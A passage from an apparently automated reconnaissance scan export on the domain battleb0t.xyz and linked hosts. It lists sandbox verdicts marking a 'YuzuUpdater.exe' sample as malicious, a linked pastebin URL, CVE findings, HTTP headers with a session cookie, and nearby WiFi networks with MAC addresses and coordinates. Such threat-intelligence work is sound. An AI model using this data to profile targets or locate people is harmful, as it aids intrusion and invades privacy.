"475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:48:16 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [{u'file_process_pid': 2400, u'filename': u'00000000-00002400.00000001.68217.00020000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\YuzuUpdater.exe', u'flags': u'00000040', u'file_process_sha256': u'3fba8f17cfa66d0984dd5016c50e2b7f323a37f213a8c67f04c27d3be67dc77a', u'address': u'00020000', u'verdict': u'malicious', u'file_process': u'YuzuUpdater.exe'}, {u'file_process_pid': 2400, u'filename': u'00000000-00002400.00000003.77575.00020000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\YuzuUpdater.exe', u'flags': u'00000040', u'file_process_sha256': u'3fba8f17cfa66d0984dd5016c50e2b7f323a37f213a8c67f04c27d3be67dc77a', u'address': u'00020000', u'verdict': u'malicious', u'file_process': u'YuzuUpdater.exe'}, {u'file_process_pid': 2400, u'filename': u'00000000-00002400.00000000.66297.00020000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\YuzuUpdater.exe', u'flags': u'00000040', u'file_process_sha256': u'3fba8f17cfa66d0984dd5016c50e2b7f323a37f213a8c67f04c27d3be67dc77a', u'address': u'00020000', u'verdict': u'malicious', u'file_process': u'YuzuUpdater.exe'}, {u'file_process_pid': 2400, u'filename': u'00000000-00002400.00000002.70138.00010000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\YuzuUpdater.exe', u'flags': u'00000040', u'file_process_sha256': u'3fba8f17cfa66d0984dd5016c50e2b7f323a37f213a8c67f04c27d3be67dc77a', u'address': u'00010000', u'verdict': u'malicious', u'file_process': u'YuzuUpdater.exe'}, {u'file_process_pid': 2400, u'filename': u'00000000-00002400.00000000.66297.00010000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\YuzuUpdater.exe', u'flags': u'00000040', u'file_process_sha256': u'3fba8f17cfa66d0984dd5016c50e2b7f323a37f213a8c67f04c27d3be67dc77a', u'address': u'00010000', u'verdict': u'malicious', u'file_process': u'YuzuUpdater.exe'}, {u'file_process_pid': 2400, u'filename': u'00000000-00002400.00000002.70138.00020000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\YuzuUpdater.exe', u'flags': u'00000040', u'file_process_sha256': u'3fba8f17cfa66d0984dd5016c50e2b7f323a37f213a8c67f04c27d3be67dc77a', u'address': u'00020000', u'verdict': u'malicious', u'file_process': u'YuzuUpdater.exe'}, {u'file_process_pid': 2400, u'filename': u'00000000-00002400.00000001.68217.00010000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\YuzuUpdater.exe', u'flags': u'00000040', u'file_process_sha256': u'3fba8f17cfa66d0984dd5016c50e2b7f323a37f213a8c67f04c27d3be67dc77a', u'address': u'00010000', u'verdict': u'malicious', u'file_process': u'YuzuUpdater.exe'}, {u'file_process_pid': 2400, u'filename': u'00000000-00002400.00000003.77575.00010000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\YuzuUpdater.exe', u'flags': u'00000040', u'file_process_sha256': u'3fba8f17cfa66d0984dd5016c50e2b7f323a37f213a8c67f04c27d3be67dc77a', u'address': u'00010000', u'verdict': u'malicious', u'file_process': u'YuzuUpdater.exe'}], u'analysis_related_urls': [{u'url': u'https://pastebin.com/raw/tc6pk7rz', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 1, u'threat_score': 51, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': 4, u'submit_name': u'Yuzu Updater.exe', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-176', u'name': u'Calls an API typically used to retrieve function addresses', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"YuzuUpdater.exe" called "GetProcAddress" with a parameter FlsGetValue (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter DecodePointer (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter UrlIsW (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter GetFileVersionInfoW (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter VerQueryValueW (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter FlsAlloc (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter FlsSetValue (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter LCMapStringEx (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter InitializeConditionVariable (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter SleepConditionVariableCS (UID: 00000000-00002400)\n "YuzuUpdater.exe" called "GetProcAddress" with a parameter WakeAllConditionVariable (UID: 00000000-00002400)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"YuzuUpdater.exe" failed to load missing module "api-ms-win-appmodel-runtime-l1-1-2.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "api-ms-win-appmodel-runtime-l1-1-0.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "api-ms-win-core-fibers-l1-1-1" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "api-ms-win-core-localization-l1-2-1" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "api-ms-win-core-quirks-l1-1-0.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\system32\\combase.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\comctl32.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll" - [base:0; Status:c0000135]\n "YuzuUpdater.exe" failed to load missing module "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll" - [base:0; Status:c0000135]'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"YuzuUpdater.exe" loaded module "API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL" at base 0\n "YuzuUpdater.exe" loaded module "API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL" at base 0\n "YuzuUpdater.exe" loaded module "VERSION.DLL" at base 74880000\n "YuzuUpdater.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 72770000\n "YuzuUpdater.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 0\n "YuzuUpdater.exe" loaded module "KERNEL32" at base 760d0000\n "YuzuUpdater.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 0\n "YuzuUpdater.exe" loaded module "%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL" at base 68730000\n "YuzuUpdater.exe" loaded module "USER32.DLL" at base 75b10000\n "YuzuUpdater.exe" loaded module "API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL" at base 0\n "YuzuUpdater.exe" loaded module "%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL" at base 0\n "YuzuUpdater.exe" loaded module "MSCOREE.DLL" at base 6caf0000\n "YuzuUpdater.exe" loaded module "%WINDIR%\\SYSTEM32\\COMBASE.DLL" at base 0\n "YuzuUpdater.exe" loaded module "PSAPI.DLL" at base 77550000\n "YuzuUpdater.exe" loaded module "RPCRT4.DLL" at base 75960000\n "YuzuUpdater.exe" loaded module "KERNEL32.DLL" at base 760d0000\n "YuzuUpdater.exe" loaded module "%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACC | 185.199.110.153 |
| 2023-05-12 02:44:17 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:50c0:8000::153 | www.battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | RowanLofts (Net ID: 00:02:2A:F0:3C:C7) | 34.0544, -118.244 |
| 2023-05-12 03:07:25 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 185.199.110.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | binkyandwooby (Net ID: 00:01:24:F0:A5:3F) | 37.7642, -122.3993 |
| 2023-05-12 02:46:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 21, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://virtualvacation.us/private-room', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "d3d11.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "%WINDIR%\\system32\\hevcdecoder.dll" - [base:0; Status:c0000135]\n "msedge.exe" failed to load missing module "d3d12.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2036:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:2036:120:WilError_01"\n "SM0:7152:120:WilError_01"\n "Local\\SM0:7152:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:7152:120:WilError_01"\n "Local\\SM0:2036:120:WilError_01"\n "SM0:2036:304:WilStaging_02"\n "Local\\SM0:2036:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2036:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:2036:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "142.250.72.195:443"\n "104.18.11.207:443"\n "104.17.25.14:443"\n "192.229.173.207:443"\n "142.250.189.170:443"\n "142.251.46.170:443"\n "104.16.123.175:443"\n "172.64.133.15:443"\n "35.190.80.1:443"\n "172.217.164.104:443"\n "142.250.191.78:443"\n "107.22.57.98:443"\n "142.251.46.238:443"\n "142.250.101.156:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"a.nel.cloudflare.com"\n "maxcdn.bootstrapcdn.com"\n "secure-players.herokuapp.com"\n "use.fontawesome.com"\n "www.w3schools.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<meta property="twitter:card" content="summary_large_image">" (Indicator: "twitter")\n "<meta property="twitter:url" content="https://virtualvacation.us/private-room">" (Indicator: "twitter")\n "<meta property="twitter:title" content="Private Multiplayer Rooms - City Guesser">" (Indicator: "twitter")\n "<meta property="twitter:description" content="Multiplayer Video Guessing Game">" (Indicator: "twitter")\n "<a class="facebookBtn smGlobalBtn2" href="https://www.facebook.com/sharer/sharer.php?u=https://virtualvacation.us/multiplayer" ><i class="fab fa-facebook"></i></a>" (Indicator: "facebook.com")\n "<a class="twitterBtn smGlobalBtn2" href="https://twitter.com/intent/tweet?url=https://virtualvacation.us/multiplayer&text=Play City Guesser Multiplayer with me. You have to guess the location from the shown video!" ><i class="fab fa-twitter"></i></a>" (Indicator: "twitter")\n "<a class="googleplusBtn smGlobalBtn2" href="#" ><i class="fab fa-twitter"></i></a> -->" (Indicator: "twitter")\n "<a id="linkedin-id" class="linkedinBtn smGlobalBtn2" href="https://www.linkedin.com/shareArticle?mini=true&url=https://virtualvacation.us/multiplayer&title=&summary=Play City Guesser Multiplayer with me. You have to guess the location from the shown video!&source=" ><i class="fab fa-linkedin-in"></i></a>" (Indicator: "linkedin.com")\n "/* twitter button class*/" (Indicator: "twitter")\n ".twitterBtn{" (Indicator: "twitter")\n ".twitterBtn:before{" (Indicator: "twitter")\n "/* add twitter icon */" (Indicator: "twitter")\n ".twitterBtn:hover{" (Indicator: "twitter")\n "tag.src = "https://www.youtube.com/iframe_api";" (Indicator: "youtube")\n "// 3. This function creates an <iframe> (and YouTube player)" (Indicator: "youtube")\n "function onYouTubeIframeAPIReady() {" (Indicator: "youtube")\n "// history.pushState(null, null, \'https://twitter.com/hello\');" (Indicator: "twitter")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\MICROSOFT EDGE.LNK"\n "msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk"\n "msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Microsoft Edge.lnk"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00002036]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\2036_1795754548\\Filtering Rules]- [targetUID: 00000000-00002036]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00002036]\n "f_0004cd" has type "JPEG image data JFIF standard 1.01 aspect ratio density 96x96 segment length 16 Exif Standard: [TIFF image data big-endian direntries=7 orientation=upper-left xresolution=98 yresolution=106 resolutionunit=2 software=Canva] baseline precision 8 3600x2027 components 3"- [targetUID: N/A]\n "f_0004d2" has type "data"- [targetUID: N/A]\n "f_0004d0" has type "Audio file with ID3 version 2.3.0"- [targetUID: N/A]\n "36053ad8-33ca-4cc8-ad02-1a6018f2deba.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 2259133"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002036]\n "f_0004d6" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d6]- [targetUID: 00000000-00003928]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00002036]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\2036_1795754548\\Filtering Rules-AA]- [targetUID: 00000000-00002036]\n "f_0004d3" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d3]- [targetUID: 00000000-00003928]\n "cbd129db-8abc-477a-bbc1-d1a29a1132a8.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 188574"- [targetUID: N/A]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.3\\edge_autofill_field_data.json]- [targetUID: 00000000-00002036]\n "urlref_httpsvirtualvacation.usprivate-room" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00007152]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://virtualvacation.us/private-room"\n Pattern match: "https://virtualvacation.us"\n Heuristic match: "a.nel.cloudflare.com"\n Heuristic match: "maxcdn.bootstrapcdn.com"\n Heuristic match: "secure-players.herokuapp.com"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Heuristic match: "use.fontawesome.com"\n Pattern match: "www.w3schools.com"\n Pattern match: "https://maxcdn.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css"\n Pattern match: "https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"\n Pattern match: "https://cdnjs.cloudflare.co | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-nf-request-id: 01H06Y2WDQHNHJAAXWWVJBZZ5B | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WDQHNHJAAXWWVJBZZ5B", "content-type": "text/html; charset=UTF-8", "age": "0"} |
| 2023-05-12 02:44:18 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.111.153 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.122 | 34.148.97.127 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo13797 (Net ID: 00:04:E2:D8:5E:98) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ORANJA (Net ID: 00:01:24:F4:53:15) | 52.3759, 4.8975 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 001cat.github.io | 185.199.111.153 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.208): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:22 | HTTP Headers | No | Web Spider | 8 | 0 | 3 | 0 | None | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} | panel.battleb0t.xyz |
| 2023-05-12 02:54:27 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H05GB7HXKZRW69FWMYAA1JFJ
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:46:40 | Malicious IP Address | Yes | Fraudguard | 0 | 1 | 2 | 0 | None | abuse_tracker (risk level: 4) [185.199.108.153] | 185.199.108.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WTH (Net ID: 00:02:6F:21:EA:89) | 50.1188, 8.6843 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha1-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": 